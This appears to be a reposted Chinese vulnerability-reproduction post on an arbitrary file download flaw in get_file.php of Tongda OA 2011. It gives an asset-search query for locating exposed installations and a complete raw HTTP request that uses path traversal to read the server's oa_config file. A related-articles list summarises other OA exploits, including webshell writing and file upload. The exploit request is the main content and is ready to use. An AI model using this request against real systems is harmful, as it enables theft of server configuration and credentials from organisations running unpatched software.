【漏洞复现-通达OA】通达OA get_file.php 任意文件下载漏洞

这篇具有很好参考价值的文章主要介绍了【漏洞复现-通达OA】通达OA get_file.php 任意文件下载漏洞。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

一、漏洞简介

通达OA get_file.php文件存在任意文件下载漏洞,攻击者通过漏洞可以读取服务器敏感文件。

二、影响版本

● 通达OA2011

三、资产测绘

● hunterapp.name="通达 OA"
● 特征
【漏洞复现-通达OA】通达OA get_file.php 任意文件下载漏洞,漏洞复现,php,开发语言

四、漏洞复现

GET /module/AIP/get_file.php?MODULE=/&ATTACHMENT_NAME=php&ATTACHMENT_ID=.._webroot/inc/oa_config HTTP/1.1
Host: {hostname}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=lrvmku93t8g0ce7b90qaroic96; KEY_RANDOMDATA=10603
Upgrade-Insecure-Requests: 1

【漏洞复现-通达OA】通达OA get_file.php 任意文件下载漏洞,漏洞复现,php,开发语言文章来源地址https://www.toymoban.com/news/detail-833339.html

到了这里,关于【漏洞复现-通达OA】通达OA get_file.php 任意文件下载漏洞的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 【漏洞复现-通达OA】通达OA share身份认证绕过漏洞

    通达OA(Office Anywhere网络智能办公系统)是中国通达公司的一套协同办公自动化软件。通达OA /share/handle.php存在一个认证绕过漏洞,利用该漏洞可以实现任意用户登录。攻击者可以通过构造恶意攻击代码,成功登录系统管理员账户,继而在系统后台上传恶意文件控制网站服务器

    2024年02月19日
    浏览(34)
  • 致远OA SQL&任意文件下载漏洞(含批量检测POC)

    致远OA A6 test.jsp 存在sql注入漏洞,并可以通过注入写入webshell文件控制服务器 漏洞影响 致远OA A6 网络测绘 app=“致远OA6” 批量检测POC 当然扫描结果可能不是特别准确,可能因素是网络测绘工具根据语法收集的ip有出入,或者有waf检测到恶意流量跳转到防护页面等,状态码也是

    2024年02月07日
    浏览(50)
  • 致远OA wpsAssistServlet 任意文件上传漏洞 漏洞复现

    致远OA是一套办公协同管理软件。致远OA wpsAssistServlet接口存在任意文件上传漏洞,攻击者通过漏洞可以发送特定的请求包上传恶意文件,获取服务器权限。 致远OA A6、A8、A8N (V8.0SP2,V8.1,V8.1SP1) 致远OA G6、G6N (V8.1、V8.1SP1) 1、调用文件上传接口上传测试文件,请求包如下: 2、

    2024年02月11日
    浏览(52)
  • 蓝凌OA sysUiComponent 任意文件上传漏洞复现

         蓝凌核心产品EKP平台定位为新一代数字化生态OA平台,数字化向纵深发展,正加速构建产业互联网,对企业协作能力提出更高要求,蓝凌新一代生态型OA平台能够支撑办公数字化、管理智能化、应用平台化、组织生态化,赋能大中型组织更高效的内外协作与管理,支撑商

    2024年02月05日
    浏览(30)
  • 若依 4.7.6 版本 任意文件下载漏洞(审计复现)

    https://mp.weixin.qq.com/s/IrqLp2Z3c941NiN0fFcDMA 这是一个最新版漏洞 先说审计后结论,要实现 任意文件下载 漏洞,需要执行3次请求(Tips:需要先登录RouYi) 1、新增计划任务 2、执行新增的计划任务 3、访问下载文件接口 参考文章里给出 POC 1 和 POC 2(没有给出内部实现关键信息,尝

    2023年04月11日
    浏览(31)
  • 金和OA jc6 Upload 任意文件上传漏洞复现

    金和OA协同办公管理系统软件(简称金和OA),本着简单、适用、高效的原则,贴合企事业单位的实际需求,实行通用化、标准化、智能化、人性化的产品设计,充分体现企事业单位规范管理、提高办公效率的核心思想,为用户提供一整套标准的办公自动化解决方案,以帮助企

    2024年01月16日
    浏览(40)
  • 红帆OA iorepsavexml接口任意文件上传漏洞复现 [附POC]

    免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用!!! 红帆移动

    2024年02月05日
    浏览(30)
  • 通达OA——前台任意用户伪造登录

            该漏洞因为使用uid作为身份标识,攻击者通过构造恶意请求,可以直接绕过登录验证逻辑,伪装为系统管理员身份登录OA系统。         通达OA 11.5.200417版本         通达OA 2017版本         通达OA软件下载         链接:https://pan.baidu.com/s/1ZHSXVMyWyyAHId

    2024年02月07日
    浏览(25)
  • 【漏洞复现】泛微e-office OfficeServer2.php 存在任意文件读取漏洞复现

    泛微e-office OfficeServer2.php 存在任意文件读取漏洞,攻击者可通过构造特定Payload获取敏感数据信息。 请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果

    2024年02月09日
    浏览(36)
  • 通达OA_文件包含漏洞

    复现靶场:通达2017版 漏洞文件:tdwebrootispiritinterfacegateway.php 漏洞地址: /mac/gateway.php 漏洞POC:json={“url”:“/general/…/…/mysql5/my.ini”} 利用工具:https://github.com/dioos886/Tongda_File_contains 根据PHP代码存在以下问题 这部分代码允许从外部传递的JSON数据中提取 $url ,然后通过

    2024年02月09日
    浏览(31)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包